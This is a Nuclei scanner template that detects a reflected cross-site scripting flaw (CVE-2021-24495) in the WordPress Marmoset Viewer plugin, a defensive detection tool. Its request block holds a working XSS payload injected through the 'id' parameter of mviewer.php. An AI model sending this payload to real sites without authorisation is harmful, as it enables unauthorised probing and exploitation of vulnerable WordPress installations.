id: CVE-2021-24495

info:
  name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting
  author: johnjhacking
  severity: medium
  description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not properly sanitize, validate, or escape the 'id' parameter before outputting back in the page.
  remediation: |
    Update the WordPress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability.
  reference:
    - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
    - https://wordpress.org/plugins/marmoset-viewer/#developers
    - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24495
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24495
    cwe-id: CWE-79
    epss-score: 0.00116
    epss-percentile: 0.4515
    cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: marmoset
    product: marmoset_viewer
    framework: wordpress
  tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://"
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          -
          - alert(/{{randstr}}/)
        condition: or

      - type: word
        words:
          - Marmoset Viewer

      - type: status
        status:
          - 200
# digest: 490a004630440220224913fbfe79812723f6c3c9520ff926a2736b836db31dff069f66e5b168171302206f9386d76c364eee916825bdc31bdb38c014db733c726fc0a8ccf645051a05f9:922c64590222798bb761d5b6d8e72950